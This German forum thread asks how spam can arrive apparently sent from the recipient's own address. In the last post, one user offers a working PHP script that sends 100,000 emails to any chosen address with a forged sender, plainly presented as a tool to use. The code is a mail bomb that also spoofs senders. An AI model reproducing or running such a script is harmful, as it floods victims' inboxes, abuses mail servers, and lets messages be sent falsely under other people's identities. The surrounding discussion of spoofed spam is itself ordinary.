KunstNet uses Cookies. Details.
  • sind wir nicht alle ein wenig ...SPAMMER?

  • suomynonA sind wir nicht alle ein wenig ...SPAMMER?
    In letzter Zeit gehen in meine Inbox öfter Mails wie diese ein:

    [swf width=644 height=404] đź”— [/swf]

    Wie geht das? Da schickt ein Spammer unter meiner Mailadresse Spam an meine Mailadresse! Ein Tracerouting geht nach Nordamerika, habs mal durchsuchen lassen. Was verschickt der wohl noch so alles unter meiner Mailadresse? Was kann man dagegen machen? Wohl nix, oder? Wirds irgendwann im Internet richtig gefährlich?

    Hat jemand auch schon solche Mails bekommen?
  • sonadora
    sonadora
    hab schon mehrere male mails über die adresse von freunden bekommen, die diese spams aber ganz sicher nicht verschickt haben und sich auch nicht erklären konnten, wie das passiert ist. sind auch alle bei unterschiedlichen anbietern, hab keine ahnung wie das geht :-/
    Signature
  • suomynonA
    da könntes aber sehr wahrscheinlich sein, dass ein freund oder auch mehrere sich nen wurm eingefangen haben, der sich an die einträge der email adressbücher weiterverschickt. würd ich so vermuten

    übrigens funktioniert das so mit den gefälschten email absendern: hier ein php skript, dass an irgendeine mailadresse 100.000 mails schickt, mit beliebiger absenderadresse:


    <?php



    # An welche Adresse sollen die Mails gesendet werden?
    $strEmpfaenger = "empfänger@website.de";

    # Wieviel Mails?
    $bomben=100000;

    # Welche Adresse soll als Absender angegeben werden?
    $strFrom= '<deinwunschadresse@adresse.de>';

    # Welchen Betreff sollen die Mails erhalten?
    $strSubject= 'dein betreff';

    $strDelimiter = ":\t";
    $strMailtext = "hier dein text";



    for ($i=0; $i<$bomben; $i++)
    mail($strEmpfaenger, $strSubject, $strMailtext, "From: ".$strFrom);
    ?>
  • Jetzt bei Amazon gĂĽnstig Kunstbedarf kaufen.- Werbpartner -
  • Page 1 of 1 [ 3 Posts ]

  • Sign in to respond or to ask a question.

Related topics and pictures